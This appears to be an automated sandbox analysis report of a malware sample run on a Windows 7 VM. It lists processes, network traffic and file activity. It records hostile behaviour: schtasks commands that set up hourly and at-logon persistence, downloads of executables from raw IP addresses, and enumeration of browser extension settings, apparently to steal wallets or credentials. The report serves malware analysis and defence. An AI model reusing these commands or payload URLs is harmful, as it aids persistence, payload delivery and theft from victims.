Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Jan. 17, 2024, 8:05 a.m. | Jan. 17, 2024, 8:21 a.m. |
-
-
schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
2448 -
schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
2560 -
HMY7P2elTJeLWFuUrZFu.exe "C:\Users\test22\AppData\Local\Temp\jobA4yn4sZHVEZHsgO\HMY7P2elTJeLWFuUrZFu.exe"
2724 -
2hMM9txR1g67fgph3Nnz.exe "C:\Users\test22\AppData\Local\Temp\jobA4yn4sZHVEZHsgO\2hMM9txR1g67fgph3Nnz.exe"
2780-
-
iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2832 CREDAT:145409
2912
-
-
chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://accounts.google.com
2460-
chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xb0,0xb4,0xb8,0x84,0xbc,0x7fef2c86e00,0x7fef2c86e10,0x7fef2c86e20
2744
-
-
-
-
crashreporter.exe "C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\1pfa5s83.default-release\minidumps\c497e1ef-bec2-4cab-999c-911c20288065.dmp"
2620-
minidump-analyzer.exe "C:\Program Files\Mozilla Firefox\minidump-analyzer.exe" "C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\1pfa5s83.default-release\minidumps\c497e1ef-bec2-4cab-999c-911c20288065.dmp"
1780
-
-
-
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
fbcdn.net | 157.240.215.35 | |
facebook.com | 157.240.215.35 | |
www.facebook.com | 157.240.215.35 | |
ipinfo.io | 34.117.186.192 | |
static.xx.fbcdn.net |
CNAME
scontent.xx.fbcdn.net
|
157.240.215.14 |
fbsbx.com | 157.240.215.35 | |
db-ip.com | 104.26.5.15 | |
connect.facebook.net |
CNAME
scontent.xx.fbcdn.net
|
157.240.215.14 |
IP Address | Status | Action |
---|---|---|
109.107.182.3 | Active | Moloch |
117.18.232.200 | Active | Moloch |
157.240.215.14 | Active | Moloch |
157.240.215.35 | Active | Moloch |
164.124.101.2 | Active | Moloch |
172.67.75.166 | Active | Moloch |
185.215.113.68 | Active | Moloch |
193.233.132.62 | Active | Moloch |
34.117.186.192 | Active | Moloch |
23.67.53.17 | Active | Moloch |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49168 172.67.75.166:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5 |
TLSv1 192.168.56.103:49194 157.240.215.14:443 |
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com | 29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5 |
TLSv1 192.168.56.103:49191 157.240.215.14:443 |
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com | 29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5 |
TLSv1 192.168.56.103:49192 157.240.215.14:443 |
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com | 29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5 |
TLSv1 192.168.56.103:49198 157.240.215.35:443 |
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com | 29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5 |
TLSv1 192.168.56.103:49203 157.240.215.35:443 |
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=fbcdn.net | e1:b5:47:7b:aa:89:cf:ef:84:ea:87:3a:8e:d0:cd:a8:cd:5f:55:8b |
TLSv1 192.168.56.103:49197 157.240.215.14:443 |
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com | 29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5 |
TLSv1 192.168.56.103:49188 157.240.215.35:443 |
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com | 29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5 |
TLSv1 192.168.56.103:49187 157.240.215.35:443 |
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com | 29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5 |
TLSv1 192.168.56.103:49196 157.240.215.14:443 |
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com | 29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5 |
TLSv1 192.168.56.103:49199 157.240.215.35:443 |
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com | 29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5 |
TLSv1 192.168.56.103:49201 157.240.215.35:443 |
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=fbcdn.net | e1:b5:47:7b:aa:89:cf:ef:84:ea:87:3a:8e:d0:cd:a8:cd:5f:55:8b |
TLSv1 192.168.56.103:49200 157.240.215.35:443 |
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=fbcdn.net | e1:b5:47:7b:aa:89:cf:ef:84:ea:87:3a:8e:d0:cd:a8:cd:5f:55:8b |
TLSv1 192.168.56.103:49205 157.240.215.14:443 |
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com | 29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5 |
TLSv1 192.168.56.103:49206 157.240.215.14:443 |
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com | 29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5 |
TLSv1 192.168.56.103:49195 157.240.215.14:443 |
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com | 29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5 |
TLSv1 192.168.56.103:49193 157.240.215.14:443 |
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com | 29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5 |
TLSv1 192.168.56.103:49202 157.240.215.35:443 |
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=fbcdn.net | e1:b5:47:7b:aa:89:cf:ef:84:ea:87:3a:8e:d0:cd:a8:cd:5f:55:8b |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
file | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe |
file | C:\Program Files\Mozilla Firefox\api-ms-win-core-file-l2-1-0.dll |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe\PATH |
registry | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe |
suspicious_features | Connection to IP address | suspicious_request | HEAD http://185.215.113.68/mine/amer.exe | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://185.215.113.68/mine/amer.exe | ||||||
suspicious_features | Connection to IP address | suspicious_request | HEAD http://109.107.182.3/cost/go.exe | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://109.107.182.3/cost/go.exe |
request | HEAD http://185.215.113.68/mine/amer.exe |
request | GET http://185.215.113.68/mine/amer.exe |
request | HEAD http://109.107.182.3/cost/go.exe |
request | GET http://109.107.182.3/cost/go.exe |
request | GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml |
request | GET https://db-ip.com/demo/home.php?s=175.208.134.152 |
request | GET https://www.facebook.com/login |
request | GET https://static.xx.fbcdn.net/rsrc.php/v3/y1/r/0_HoU29ShlI.js?_nc_x=Ij3Wp8lg5Kz |
request | GET https://static.xx.fbcdn.net/rsrc.php/v3/y2/l/0,cross/7_6o7HJ05F8.css?_nc_x=Ij3Wp8lg5Kz |
request | GET https://static.xx.fbcdn.net/rsrc.php/v3/yV/l/0,cross/om552iOCRxJ.css?_nc_x=Ij3Wp8lg5Kz |
request | GET https://static.xx.fbcdn.net/rsrc.php/v3/y5/l/0,cross/QoWVNltU_ZO.css?_nc_x=Ij3Wp8lg5Kz |
request | GET https://static.xx.fbcdn.net/rsrc.php/v3/ya/l/0,cross/EQ0cyse2DGv.css?_nc_x=Ij3Wp8lg5Kz |
request | GET https://static.xx.fbcdn.net/rsrc.php/v3/yr/l/0,cross/wMc7fNlPdnA.css?_nc_x=Ij3Wp8lg5Kz |
request | GET https://static.xx.fbcdn.net/rsrc.php/y1/r/4lCu2zih0ca.svg |
request | GET https://facebook.com/security/hsts-pixel.gif?c=3.2.5 |
request | GET https://static.xx.fbcdn.net/rsrc.php/v3/yE/r/xGzxHIbkRpC.js?_nc_x=Ij3Wp8lg5Kz |
request | GET https://fbcdn.net/security/hsts-pixel.gif?c=2.5 |
request | GET https://static.xx.fbcdn.net/rsrc.php/v3/yK/r/Lzd-U--zeLf.js?_nc_x=Ij3Wp8lg5Kz |
request | GET https://static.xx.fbcdn.net/rsrc.php/v3/yB/r/Y0L6f5sxdIV.png |
request | GET https://static.xx.fbcdn.net/rsrc.php/v3/yU/r/O7nelmd9XSI.png |
request | GET https://fbsbx.com/security/hsts-pixel.gif?c=5 |
request | GET https://connect.facebook.net/security/hsts-pixel.gif |
request | GET https://www.facebook.com/favicon.ico |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\MEIPreload\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Sync Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Local Extension Settings\bgpipimickeadkjlklgciifhnalhdjhe\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Sync Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\epapihdplajcdnnkdeiahlgigofloibg\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Sync Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\MEIPreload\Sync Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\recovery\Sync Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Sync Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Sync Extension Settings\fhilaheimglignddkjgofkcbgekhenbh\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobl\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crowd Deny\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Sync Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflal\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Sync Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm\CURRENT |
domain | ipinfo.io |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\Lzd-U--zeLf[1].js |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\xGzxHIbkRpC[1].js |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\0_HoU29ShlI[1].js |
file | C:\Users\test22\AppData\Local\Temp\jobA4yn4sZHVEZHsgO\HMY7P2elTJeLWFuUrZFu.exe |
file | C:\Users\test22\AppData\Local\Temp\jobA4yn4sZHVEZHsgO\2hMM9txR1g67fgph3Nnz.exe |
cmdline | schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST |
cmdline | schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST |
file | C:\Users\test22\AppData\Local\Temp\jobA4yn4sZHVEZHsgO\HMY7P2elTJeLWFuUrZFu.exe |
file | C:\Users\test22\AppData\Local\Temp\jobA4yn4sZHVEZHsgO\2hMM9txR1g67fgph3Nnz.exe |
file | C:\Users\test22\AppData\Local\Temp\jobA4yn4sZHVEZHsgO\HMY7P2elTJeLWFuUrZFu.exe |
file | C:\Users\test22\AppData\Local\Temp\jobA4yn4sZHVEZHsgO\2hMM9txR1g67fgph3Nnz.exe |